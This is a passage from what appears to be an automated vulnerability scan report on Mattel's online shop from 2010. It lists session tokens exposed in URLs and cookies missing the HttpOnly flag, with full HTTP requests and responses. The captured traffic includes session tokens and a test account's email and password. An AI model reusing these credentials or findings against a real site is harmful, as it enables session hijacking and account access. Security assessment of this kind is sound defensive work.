X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45303


                                                                                                            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
...[SNIP]...

3.6. http://shop.mattel.com/product/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /product/index.jsp?productId=4199678 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:23:19 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54256


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<div id="langToggle">&#91;
<a href="/home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US">En espa.ol</a>
...[SNIP]...
</div>
<a href="/home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825" id="header-logo">Mattel Shop</a>
...[SNIP]...
<li><a href="/category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3719987" >Shop By Category</a>
...[SNIP]...
<li><a href="/category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741284" rel="redir:p+cp=3719987">Dolls & Accessories</a>
...[SNIP]...
<li><a href="/family/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741278" rel="redir:p+cp=3719987.3741284">Fashion Dolls</a>
...[SNIP]...
<div id="assistance">    
           For assistance 24/7 <a href="/helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&amp;subdisplay=contact" title="Contact Us">Contact us via email</a>
...[SNIP]...
<li><a href="/helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&amp;subdisplay=contact&amp;stillHaveQuestion=yes" title="Contact Us">Contact Us</a>
...[SNIP]...

4. Cookie without HttpOnly flag set
There are 27 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://shop.mattel.com/product/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/index.jsp?productId=4199678 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:23:19 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54256


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...

4.2. https://shop.mattel.com/affiliate/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:16 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=bGkwNSJQK1gxnpPZcfpDGyz9DBWqmgjmKFr3FtyLQYQJNGQ2yfF2!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38474


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...

4.3. https://shop.mattel.com/brand/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brand/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=vXThNSJGvphcGlG0d0LJVTlQkpRwpfvpyMkBCbTY3tRF30zxYTN0!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36834


                                                                                            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...

4.4. https://shop.mattel.com/cart/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /cart/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/cart/index.jsp
Set-Cookie: JSESSIONID=TG2TNSJLw8tNpQytl4Ltw1WL82GGTGkRD2vPLnj1GMtCSh4GnV1t!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/cart/index.
...[SNIP]...

4.5. https://shop.mattel.com/coreg/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /coreg/index.jsp HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: https://shop.mattel.com/checkout/index.jsp?process=login
Cache-Control: max-age=0
Origin: https://shop.mattel.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084615922}
Content-Length: 61

step=login&email=test%40fastdial.net&password=SkipIt1&x=0&y=0

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:11:07 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=myaccount
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; expires=Sunday, 20-Dec-2020 00:11:07 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 315

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/checkout/i
...[SNIP]...

4.6. https://shop.mattel.com/coreg/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=logout HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=6TpLNSJL0sSbVTJGNGF9tvc8WHGvvD4HfTGyLfTM2DLYnwBrX1SZ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 305

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/checkout/i
...[SNIP]...

4.7. https://shop.mattel.com/emailSignup/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /emailSignup/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=z2JTNSJGhpmmnjKYH7vGhX4Xk9ZThL4KvvQmnmT1QN5WhZmWlN5h!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51584


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...

4.8. https://shop.mattel.com/giftCertificates/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /giftCertificates/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:41 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=mw1vNSJNFCyh5FlZyvhHzyRGSJT5vYGh8sMKRw1FzyHQMrSMrqBQ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 44100


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   
...[SNIP]...

4.9. https://shop.mattel.com/product/wishlist/wishlist.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/wishlist/wishlist.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: https://shop.mattel.com/coreg/index.jsp?step=register
Set-Cookie: JSESSIONID=6BhgNSJLtGv2pTRm0wdSQBcrGXQYDXK4wBgNtqrM8p1yzPSGsSxQ!-1434729825; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:46 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 301

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/coreg/inde
...[SNIP]...

4.10. https://shop.mattel.com/search/controller.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /search/controller.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
